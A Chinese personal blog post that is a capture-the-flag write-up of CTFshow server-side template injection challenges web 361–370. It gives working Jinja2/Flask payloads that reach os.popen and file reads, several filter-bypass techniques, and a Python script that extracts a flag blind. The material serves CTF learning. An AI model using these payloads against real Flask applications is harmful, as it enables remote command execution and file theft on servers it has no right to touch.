<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="CTFSHOW-SSTI, marin的小窝">
    <meta name="description" content="SSTIweb 361
名字就是考点

这里就是考的参数是 name
这个就是最简单的 SSTI ，没有任何过滤
&amp;#123;&amp;#123; &amp;quot;&amp;quot;.__class__.__base__.__subclasses__()[1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>CTFSHOW-SSTI | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/%E6%97%A0%E9%A2%98_97085306.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">CTFSHOW-SSTI</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/%E5%88%B7%E9%A2%98/">
                                <span class="chip bg-color">刷题</span>
                            </a>
                        
                            <a href="/tags/ssti/">
                                <span class="chip bg-color">ssti</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/CTFSHOW/" class="post-category">
                                CTFSHOW
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-07-26
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="SSTI"><a href="#SSTI" class="headerlink" title="SSTI"></a>SSTI</h1><h3 id="web-361"><a href="#web-361" class="headerlink" title="web 361"></a>web 361</h3><blockquote>
<p>名字就是考点</p>
</blockquote>
<p>这里就是考的参数是 <code>name</code></p>
<p>这个就是最简单的 SSTI ，没有任何过滤</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; &quot;&quot;.__class__.__base__.__subclasses__()[132].__init__.__globals__[&#39;popen&#39;](&#39;ls ..&#x2F;&#39;).read() &#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728153547-20260228215309-3fyga20.png" alt="image"></p>
<p>‍</p>
<h3 id="web-362"><a href="#web-362" class="headerlink" title="web 362"></a>web 362</h3><p>应该是过滤了数字，但是1没被过滤，最铸币的方法就是1+1一直加下去（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728195254-20260228215309-3vpe84x.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728195412-20260228215309-sr5mqko.png" alt="image"></p>
<p>这里看 wp 发现另一个做法，用全角字符替代数字</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">def half2full(half):  
    full &#x3D; &#39;&#39;  
    for ch in half:  
        if ord(ch) in range(33, 127):  
            ch &#x3D; chr(ord(ch) + 0xfee0)  
        elif ord(ch) &#x3D;&#x3D; 32:  
            ch &#x3D; chr(0x3000)  
        else:  
            pass  
        full +&#x3D; ch  
    return full  
t&#x3D;&#39;&#39;
s&#x3D;&quot;0123456789&quot;
for i in s:
    t+&#x3D;&#39;\&#39;&#39;+half2full(i)+&#39;\&#39;,&#39;
print(t)</code></pre>

<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()[１３２].__init__.__globals__[&#39;popen&#39;](&#39;cat ..&#x2F;f*&#39;).read()&#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728195731-20260228215309-pe3phoj.png" alt="image"></p>
<p>这里还学到另一种方法，利用已有函数，去获取 <code>__builtins__</code></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__.__builtins__[&#39;eval&#39;](&quot;__import__(&#39;os&#39;).popen(&#39;ls&#39;).read()&quot;) &#125;&#125;</code></pre>

<p>或者直接拿 os</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__[&#39;os&#39;].popen(&#39;ls&#39;).read() &#125;&#125;</code></pre>

<p>这里还有一种方法，x可以用任意字母</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; x.__init__.__globals__[&#39;__builtins__&#39;] &#125;&#125;</code></pre>

<p>再或者用循环来构造</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% for i in &quot;&quot;.__class__.__base__.__subclasses__() %&#125;
&#123;% if i.__name__ &#x3D;&#x3D; &#39;_wrap_close&#39; %&#125;
&#123;% print i.__init__.__globals__[&#39;popen&#39;](&#39;ls&#39;).read() %&#125;
&#123;% endif %&#125;
&#123;% endfor %&#125;</code></pre>

<p>‍</p>
<h3 id="web-363"><a href="#web-363" class="headerlink" title="web 363"></a>web 363</h3><p>被过滤了 <code>&quot;&quot;</code>​ 和 <code>&#39;&#39;</code></p>
<p>这里学到可以用 <code>request.args.a</code> 来获取数据</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123;1.__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()&#125;&#125;
&amp;a&#x3D;popen&amp;b&#x3D;ls</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728214607-20260228215309-xyddf3q.png" alt="image"></p>
<hr>
<p>还可以用字符串拼接</p>
<p>这里使用 flask 配置的 config 获取字符，就是有点麻烦，要一个个找</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123;config.__str__()[1]&#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728215131-20260228215309-oa9jcnv.png" alt="image"></p>
<p>也可以先看看里面有什么东西</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; config.__str__() &#125;&#125;</code></pre>

<p>然后使用一个简单的 python 脚本来实现就行</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">a&#x3D;  &quot;&quot;&quot;&lt;Config &#123;&#39;ENV&#39;: &#39;production&#39;, &#39;DEBUG&#39;: False, &#39;TESTING&#39;: False, &#39;PROPAGATE_EXCEPTIONS&#39;: None, &#39;PRESERVE_CONTEXT_ON_EXCEPTION&#39;: None, &#39;SECRET_KEY&#39;: None, &#39;PERMANENT_SESSION_LIFETIME&#39;: datetime.timedelta(days&#x3D;31), &#39;USE_X_SENDFILE&#39;: False, &#39;SERVER_NAME&#39;: None, &#39;APPLICATION_ROOT&#39;: &#39;&#x2F;&#39;, &#39;SESSION_COOKIE_NAME&#39;: &#39;session&#39;, &#39;SESSION_COOKIE_DOMAIN&#39;: None, &#39;SESSION_COOKIE_PATH&#39;: None, &#39;SESSION_COOKIE_HTTPONLY&#39;: True, &#39;SESSION_COOKIE_SECURE&#39;: False, &#39;SESSION_COOKIE_SAMESITE&#39;: None, &#39;SESSION_REFRESH_EACH_REQUEST&#39;: True, &#39;MAX_CONTENT_LENGTH&#39;: None, &#39;SEND_FILE_MAX_AGE_DEFAULT&#39;: datetime.timedelta(seconds&#x3D;43200), &#39;TRAP_BAD_REQUEST_ERRORS&#39;: None, &#39;TRAP_HTTP_EXCEPTIONS&#39;: False, &#39;EXPLAIN_TEMPLATE_LOADING&#39;: False, &#39;PREFERRED_URL_SCHEME&#39;: &#39;http&#39;, &#39;JSON_AS_ASCII&#39;: True, &#39;JSON_SORT_KEYS&#39;: True, &#39;JSONIFY_PRETTYPRINT_REGULAR&#39;: False, &#39;JSONIFY_MIMETYPE&#39;: &#39;application&#x2F;json&#39;, &#39;TEMPLATES_AUTO_RELOAD&#39;: None, &#39;MAX_COOKIE_SIZE&#39;: 4093&#125;&gt;
&quot;&quot;&quot;
b &#x3D; []

code &#x3D; &quot;cat &#x2F;flag&quot;
for j in code:
    for i in range(len(a)):
        if a[i] &#x3D;&#x3D; j:
            b.append(i)
            break

fina &#x3D; &quot;&quot;
for i in b:
    fina +&#x3D; f&quot;(config.__str__()[&#123;i&#125;])%2B&quot;

print(fina)</code></pre>

<p>然后拼接命令就行</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__[(config.__str__()[2])%2B(config.__str__()[42])].popen((config.__str__()[22])%2B(config.__str__()[40])%2B(config.__str__()[23])%2B(config.__str__()[7])%2B(config.__str__()[279])%2B(config.__str__()[4])%2B(config.__str__()[41])%2B(config.__str__()[40])%2B(config.__str__()[6])).read() &#125;&#125;</code></pre>

<p>相当于</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__[&#39;os&#39;].popen(&quot;cat &#x2F;flag&quot;).read() &#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250728220736-20260228215309-by548l0.png" alt="image"></p>
<p>‍</p>
<h3 id="web-364"><a href="#web-364" class="headerlink" title="web 364"></a>web 364</h3><p>多过滤了 <code>request.args.a</code> 这个，但是字符拼接还是可以用的</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729111628-20260228215310-lii1v0e.png" alt="image"></p>
<p>上一题的 config 拼接依旧可以用</p>
<p>这里多学了一个获取 <code>chr</code></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set chr&#x3D;url_for.__globals__.__builtins__.chr %&#125;
&#123;% print url_for.__globals__[chr(111)+chr(115)].popen(chr(108)%2Bchr(115)).read() %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729112040-20260228215310-6tqrnpy.png" alt="image"></p>
<p>这里看wp发现有一个请求的方法没有被过滤，<code>request.cookies.a</code></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__[request.cookies.a].popen(request.cookies.b).read() &#125;&#125;

cookie :a&#x3D;os;b&#x3D;ls</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729112733-20260228215310-mkjz8on.png" alt="image"></p>
<p>这里还有一个获取请求数据的 <code>request.values.a</code> ， 这个可以获取 post 和 get 的值</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__.os.popen(request.values.a).read() &#125;&#125;&amp;a&#x3D;ls</code></pre>

<p>‍</p>
<h3 id="web-365"><a href="#web-365" class="headerlink" title="web 365"></a>web 365</h3><p>多过滤了 <code>[]</code> ，request 的方法依旧能用</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__.os.popen(request.values.a).read() &#125;&#125;&amp;a&#x3D;ls &#x2F;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729113539-20260228215310-3ty6jm8.png" alt="image"></p>
<p>这里还学到一个新的，使用 <code>__getitem__</code>​ 绕过 <code>[]</code> 获取字符串</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; config.__str__().__getitem__(22) &#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729113937-20260228215310-tihyf8g.png" alt="image"></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; url_for.__globals__.os.popen((config.__str__().__getitem__(22))%2B(config.__str__().__getitem__(40))%2B(config.__str__().__getitem__(23))%2B(config.__str__().__getitem__(7))%2B(config.__str__().__getitem__(279))%2B(config.__str__().__getitem__(4))%2B(config.__str__().__getitem__(41))%2B(config.__str__().__getitem__(40))%2B(config.__str__().__getitem__(6))).read() &#125;&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729113852-20260228215310-spxumoa.png"></p>
<p>‍</p>
<h3 id="web-366"><a href="#web-366" class="headerlink" title="web 366"></a>web 366</h3><p>这个甚至把 <code>_</code>​ 给过滤了，所以使用的时候就把 <code>url_for</code>​ 换成了 <code>lipsum</code>​，但是构造不出 <code>__globals__</code>​ 了，这里用到了 flask 自带的过滤器 <code>attr</code></p>
<blockquote>
<p><code>attr</code> 是用来动态获取某个属性的值</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; obj|attr(&#39;属性&#39;) &#125;&#125;
&#123;&#123; attr(obj,&#39;属性&#39;) &#125;&#125;</code></pre></blockquote>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; (lipsum|attr(request.values.a)).os.popen(request.values.b).read() &#125;&#125;

&amp;a&#x3D;__globals__&amp;b&#x3D;ls</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729115454-20260228215310-1dkfclb.png" alt="image"></p>
<p>‍</p>
<h3 id="web-367"><a href="#web-367" class="headerlink" title="web 367"></a>web 367</h3><p>os 被过滤了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729172150-20260228215310-3e3t18p.png" alt="image"></p>
<p>这里可以使用 get 来获取 request 的值</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; (lipsum|attr(request.values.a)).get(request.values.c).popen(request.values.b).read() &#125;&#125;

&amp;a&#x3D;__globals__&amp;b&#x3D;ls&amp;c&#x3D;os</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729172515-20260228215311-uqhwss5.png" alt="image"></p>
<p>也可以全部都用 attr 过滤得到</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; (x|attr(request.values.a)|attr(request.values.b)|attr(request.values.c))(request.values.d).eval(request.values.f) &#125;&#125;

&amp;a&#x3D;__init__&amp;b&#x3D;__globals__&amp;c&#x3D;__getitem__&amp;d&#x3D;__builtins__&amp;f&#x3D;__import__(&#39;os&#39;).popen(&#39;ls&#39;).read()</code></pre>

<p>相当于</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;&#123; x.__init__.__globals__.__getitem__[&#39;__builtins__&#39;].eval(cmd) &#125;&#125;</code></pre>

<p>‍</p>
<h3 id="web-368"><a href="#web-368" class="headerlink" title="web 368"></a>web 368</h3><p>多过滤了 <code>&#123;&#123;&#125;&#125;</code>​，使用 <code>&#123;%%&#125;</code> 是一样的</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% print (lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %&#125;

&amp;a&#x3D;__globals__&amp;b&#x3D;os&amp;c&#x3D;ls</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729212336-20260228215311-i8263l5.png" alt="image"></p>
<p>这里看wp学到一种使用 <code>&#123;%%&#125;</code> 盲注的方法</p>
<ul>
<li>因为使用了格式化字符串，所以原本的 <code>&#123;&#125;</code> 需要转义</li>
</ul>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">import requests

url&#x3D;&quot;https:&#x2F;&#x2F;b584c9c0-9c2d-46e5-aa9a-f0ebe0b625e0.challenge.ctf.show&quot;
flag&#x3D;&quot;&quot;
for i in range(1,100):
    for j in &quot;abcdefghijklmnopqrstuvwxyz0123456789-&#123;&#125;&quot;:
        params&#x3D;&#123;
            &#39;name&#39;:f&quot;&#123;&#123;% set a&#x3D;(lipsum|attr(request.values.a)).get(request.values.b).open(request.values.c).read(&#123;i&#125;) %&#125;&#125;&#123;&#123;% if a&#x3D;&#x3D;request.values.d %&#125;&#125;marin&#123;&#123;% endif %&#125;&#125;&quot;,
            &#39;a&#39;:&#39;__globals__&#39;,
            &#39;b&#39;:&#39;__builtins__&#39;,
            &#39;c&#39;:&#39;&#x2F;flag&#39;,
            &#39;d&#39;:f&#39;&#123;flag+j&#125;&#39;
        &#125;
        r&#x3D;requests.get(url&#x3D;url,params&#x3D;params)
        if &quot;marin&quot; in r.text:
            flag+&#x3D;j
            print(flag)
            if j&#x3D;&#x3D;&quot;&#125;&quot;:
                exit()
            break


</code></pre>

<p>相当于使用，open 配合 read 读取前面的字符，但是这个方法我感觉其实限制挺大的，可能他需要 waf 了 print，并且只能用 <code>&#123;%%&#125;</code>，去匹配，而且还要知道文件位置，先记着</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% print lipsum.__globals__[&#39;__builtins__&#39;].open(&quot;&#x2F;flag&quot;).read(i) %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729213131-20260228215311-vnjqr07.png" alt="image"></p>
<p>‍</p>
<h3 id="web-369"><a href="#web-369" class="headerlink" title="web 369"></a>web 369</h3><p>悲 <code>request</code>​ 被 waf 了，所以要构造字符了，使用 config 应该是最简单的了，但是不能使用 <code>__str__()</code> 了</p>
<p>这里学到一个过滤器调用 <code>config|string</code>​ ，意思先获取 config 对象，然后转化成字符串，等价于 <code>str(config)</code>​，这里还是差一个 <code>__getitem__()</code>​ 或 <code>[]</code> 去获取字符，但是都被 waf 了</p>
<p>这里学到的一个方法是利用列表的 pop 来获取字符，然后可以用 <code>lower</code> 获取小写字符</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% print (config|string|list).pop().lower() %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729215010-20260228215311-rp04uoo.png"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729215000-20260228215311-lvlheax.png" alt="image"></p>
<p>然后就可以使用脚本来获取字符，忒长了（</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% print (lipsum|attr(((config|string|list).pop(74).lower())%2B((config|string|list).pop(74).lower())%2B((config|string|list).pop(6).lower())%2B((config|string|list).pop(41).lower())%2B((config|string|list).pop(2).lower())%2B((config|string|list).pop(33).lower())%2B((config|string|list).pop(40).lower())%2B((config|string|list).pop(41).lower())%2B((config|string|list).pop(42).lower())%2B((config|string|list).pop(74).lower())%2B((config|string|list).pop(74).lower())))
.get(((config|string|list).pop(2).lower())%2B((config|string|list).pop(42).lower()))
.popen(((config|string|list).pop(41).lower())%2B((config|string|list).pop(42).lower())).read() %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250729215510-20260228215311-kusmu3v.png" alt="image"></p>
<hr>
<p>还学到了一种新方法，构造敏感函数</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set po&#x3D;dict(po&#x3D;a,p&#x3D;a)|join %&#125;</code></pre>

<blockquote>
<p><code>dict()</code> ：创建一个字典</p>
<p><code>|join</code>​ ：是一个过滤器，将一个可迭代对象连接成字符串，如果是字典，就只会迭代字典的键，默认用 <code>&#39;&#39;</code>​ 拼接，比如这个语句最后拼接出来的就是 <code>pop</code> 函数，所以变量 po 就是 pop 函数</p>
</blockquote>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set a&#x3D;(()|select|string|list)|attr(po)(24) %&#125;</code></pre>

<blockquote>
<p>利用 <code>()</code> 创建一个空的元组对象</p>
<p><code>select</code>​ ：过滤器，原本用于筛选序列中的元素，但是作用于一个空元组后，会生成一个生成器对象<br>​<img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730105031-20260228215312-42ylg94.png" alt="image"></p>
<p><code>string</code>​ 和 <code>list</code>​ 前面都提过，然后从这个列表中 pop 出 <code>_</code></p>
</blockquote>
<p>然后就是慢慢构造了</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set ini&#x3D;(a,a,dict(in&#x3D;a,it&#x3D;a)|join,a,a)|join %&#125;
&#123;% set glo&#x3D;(a,a,dict(glo&#x3D;a,bals&#x3D;a)|join,a,a)|join %&#125;
&#123;% set geti&#x3D;(a,a,dict(get&#x3D;a,item&#x3D;a)|join,a,a)|join %&#125;
&#123;% set built&#x3D;(a,a,dict(builtins&#x3D;a)|join,a,a)|join %&#125;</code></pre>

<p>然后利用这些获取 <code>chr</code> 方法，后面就可以方便的构造了</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set x&#x3D;(q|attr(ini)|attr(glo)|attr(geti))(built) %&#125;
&#123;% set chr&#x3D;x.chr %&#125;</code></pre>

<p>后续就可以构造命令了</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set o&#x3D;chr(111)%2Bchr(115) %&#125;
&#123;% set cmd&#x3D;chr(108)%2Bchr(115)%2Bchr(32)%2Bchr(47) %&#125;
&#123;% print (lipsum|attr(glo)).get(o).popen(cmd).read() %&#125;</code></pre>

<p>总的 payload</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set po&#x3D;dict(po&#x3D;a,p&#x3D;a)|join %&#125;
&#123;% set a&#x3D;(()|select|string|list)|attr(po)(24) %&#125;
&#123;% set ini&#x3D;(a,a,dict(in&#x3D;a,it&#x3D;a)|join,a,a)|join %&#125;
&#123;% set glo&#x3D;(a,a,dict(glo&#x3D;a,bals&#x3D;a)|join,a,a)|join %&#125;
&#123;% set geti&#x3D;(a,a,dict(get&#x3D;a,item&#x3D;a)|join,a,a)|join %&#125;
&#123;% set built&#x3D;(a,a,dict(builtins&#x3D;a)|join,a,a)|join %&#125;
&#123;% set x&#x3D;(q|attr(ini)|attr(glo)|attr(geti))(built) %&#125;
&#123;% set chr&#x3D;x.chr %&#125;
&#123;% set o&#x3D;chr(111)%2Bchr(115) %&#125;
&#123;% set cmd&#x3D;chr(108)%2Bchr(115)%2Bchr(32)%2Bchr(47) %&#125;
&#123;% print (lipsum|attr(glo)).get(o).popen(cmd).read() %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730111520-20260228215312-824jxbm.png" alt="image"></p>
<p>‍</p>
<h3 id="web-370"><a href="#web-370" class="headerlink" title="web 370"></a>web 370</h3><p>又 waf 了我的数字</p>
<p>这里学到两个方法，当然，全角字符还是能用的</p>
<p>第一个是利用 <code>index</code> 获取特殊的数字，然后获取字符，这里需要提前判断哪些需要的内容在什么位置</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set o&#x3D;dict(o&#x3D;a)|join %&#125;
&#123;% set n&#x3D;dict(n&#x3D;a)|join %&#125;
&#123;% set ershisi&#x3D;(()|select|string|list).index(o)*(()|select|string|list).index(n) %&#125;
&#123;% set liushisi&#x3D;(()|select|string|list).index(o)*(()|select|string|list).index(o) %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730113600-20260228215312-9yaga0p.png" alt="image"></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set o&#x3D;dict(o&#x3D;a)|join %&#125;
&#123;% set n&#x3D;dict(n&#x3D;a)|join %&#125;
&#123;% set ershisi&#x3D;(()|select|string|list).index(o)*(()|select|string|list).index(n) %&#125;
&#123;% set liushisi&#x3D;(()|select|string|list).index(o)*(()|select|string|list).index(o) %&#125;
# 这个是 &#x2F;
&#123;% set a&#x3D;(config|string|list).pop(-liushisi) %&#125;
# 这个是 _
&#123;% set b&#x3D;(()|select|string|list).pop(ershisi) %&#125;
&#123;% set glo&#x3D;(b,b,dict(globals&#x3D;a)|join,b,b)|join %&#125;
&#123;% set built&#x3D;(b,b,dict(builtins&#x3D;a)|join,b,b)|join %&#125;
&#123;% set file&#x3D;(a,dict(flag&#x3D;a)|join)|join %&#125;
&#123;% print (lipsum|attr(glo)).get(built).open(file).read() %&#125;</code></pre>

<hr>
<p>还有另一种好用一点的方法，就是利用 <code>length</code> 的过滤器，直接拿到所有数字，通过这个方法我们可以拿到所有的数字</p>
